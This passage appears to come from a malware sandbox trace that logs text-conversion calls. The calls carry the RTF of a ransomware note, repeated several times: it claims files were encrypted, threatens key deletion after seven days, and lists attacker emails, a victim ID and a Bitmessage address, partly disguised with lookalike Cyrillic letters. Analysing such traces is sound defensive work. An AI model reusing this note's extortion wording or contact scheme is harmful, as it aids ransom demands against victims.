w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 